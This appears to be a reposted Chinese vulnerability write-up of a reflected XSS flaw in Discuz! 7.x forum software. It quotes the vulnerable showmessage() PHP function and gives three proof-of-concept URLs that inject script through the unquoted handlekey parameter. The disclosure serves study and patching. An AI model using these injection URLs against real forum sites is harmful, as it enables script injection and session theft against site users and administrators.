Discuz! 7.x 反射型xss
阿新 • • 發佈:2017-05-29
觸發 res extra highlight type foreach scu serialize yun
引用:http://wooyun.jozxing.cc/static/bugs/wooyun-2014-084097.html
在/include/global.func.php 文件中 第1036-1119行中
function showmessage($message, $url_forward = ‘‘, $extra = ‘‘, $forwardtype = 0) { extract($GLOBALS, EXTR_SKIP); global $hookscriptmessage, $extrahead, $discuz_uid, $discuz_action, $debuginfo, $seccode, $seccodestatus, $fid, $tid, $charset, $show_message, $inajax, $_DCACHE, $advlist; define(‘CACHE_FORBIDDEN‘, TRUE); $hookscriptmessage = $show_message = $message;$messagehandle = 0; $msgforward = unserialize($_DCACHE[‘settings‘][‘msgforward‘]); $refreshtime = intval($msgforward[‘refreshtime‘]); $refreshtime = empty($forwardtype) ? $refreshtime : ($refreshtime ? $refreshtime : 3); $msgforward[‘refreshtime‘] = $refreshtime * 1000; $url_forward = empty($url_forward) ? ‘‘ : (empty($_DCOOKIE[‘sid‘]) && $transsidstatus ? transsid($url_forward) : $url_forward); $seccodecheck = $seccodestatus & 2; if($_DCACHE[‘settings‘][‘funcsiteid‘] && $_DCACHE[‘settings‘][‘funckey‘] && $funcstatinfo && !IS_ROBOT) { $statlogfile = DISCUZ_ROOT.‘./forumdata/funcstat.log‘; if($fp = @fopen($statlogfile, ‘a‘)) { @flock($fp, 2); if(is_array($funcstatinfo)) { $funcstatinfo = array_unique($funcstatinfo); foreach($funcstatinfo as $funcinfo) { fwrite($fp, funcstat_query($funcinfo, $message)."\n"); } } else { fwrite($fp, funcstat_query($funcstatinfo, $message)."\n"); } fclose($fp); $funcstatinfo = $GLOBALS[‘funcstatinfo‘] = ‘‘; } } if(!defined(‘STAT_DISABLED‘) && STAT_ID > 0 && !IS_ROBOT) { write_statlog($message); } if($url_forward && (!empty($quickforward) || empty($inajax) && $msgforward[‘quick‘] && $msgforward[‘messages‘] && @in_array($message, $msgforward[‘messages‘]))) { updatesession(); dheader("location: ".str_replace(‘&‘, ‘&‘, $url_forward)); } if(!empty($infloat)) { if($extra) { $messagehandle = $extra; } $extra = ‘‘; } if(in_array($extra, array(‘HALTED‘, ‘NOPERM‘))) { $discuz_action = 254; } else { $discuz_action = 255; } include language(‘messages‘); $vars = explode(‘:‘, $message); if(count($vars) == 2 && isset($scriptlang[$vars[0]][$vars[1]])) { eval("\$show_message = \"".str_replace(‘"‘, ‘\"‘, $scriptlang[$vars[0]][$vars[1]])."\";"); } elseif(isset($language[$message])) { $pre = $inajax ? ‘ajax_‘ : ‘‘; eval("\$show_message = \"".(isset($language[$pre.$message]) ? $language[$pre.$message] : $language[$message])."\";"); unset($pre); } if(empty($infloat)) { $show_message .= $url_forward && empty($inajax) ? ‘<script>setTimeout("window.location.href =\‘‘.$url_forward.‘\‘;", ‘.$msgforward[‘refreshtime‘].‘);</script>‘ : ‘‘; } elseif($handlekey) { $show_message = str_replace("‘", "\‘", $show_message); if($url_forward) { $show_message = "<script type=\"text/javascript\" reload=\"1\">\nif($(‘return_$handlekey‘)) $(‘return_$handlekey‘).className = ‘onright‘;\nif(typeof submithandle_$handlekey ==‘function‘) {submithandle_$handlekey(‘$url_forward‘, ‘$show_message‘);} else {location.href=‘$url_forward‘}\n</script>"; } else { $show_message .= "<script type=\"text/javascript\" reload=\"1\">\nif(typeof messagehandle_$handlekey ==‘function‘) {messagehandle_$handlekey(‘$messagehandle‘, ‘$show_message‘);}\n</script>"; } } if($advlist = array_merge($globaladvs ? $globaladvs[‘type‘] : array(), $redirectadvs ? $redirectadvs[‘type‘] : array())) { $advitems = ($globaladvs ? $globaladvs[‘items‘] : array()) + ($redirectadvs ? $redirectadvs[‘items‘] : array()); foreach($advlist AS $type => $redirectadvs) { $advlist[$type] = $advitems[$redirectadvs[array_rand($redirectadvs)]]; } } if($extra == ‘NOPERM‘) { include template(‘nopermission‘); } else { include template(‘showmessage‘); } dexit(); }
在這段代碼中:
elseif($handlekey) { $show_message = str_replace("‘", "\‘", $show_message); if($url_forward) { $show_message = "<script type=\"text/javascript\" reload=\"1\">\nif($(‘return_$handlekey‘)) $(‘return_$handlekey‘).className = ‘onright‘;\nif(typeof submithandle_$handlekey ==‘function‘) {submithandle_$handlekey(‘$url_forward‘, ‘$show_message‘);} else {location.href=‘$url_forward‘}\n</script>"; } else { $show_message .= "<script type=\"text/javascript\" reload=\"1\">\nif(typeof messagehandle_$handlekey ==‘function‘) {messagehandle_$handlekey(‘$messagehandle‘, ‘$show_message‘);}\n</script>"; } }
如果不存在$url_forward參數就走else,
然而這個$handlekey並沒有加引號,所以不存在繞不繞過,直接觸發。
漏洞url:
/admincp.php?infloat=yes&handlekey=123);alert(/xss/);//
/logging.php?infloat=yes&handlekey=123);alert(/xss/);//
/api/uchome.php?infloat=yes&handlekey=123);alert(/xss/);//
Discuz! 7.x 反射型xss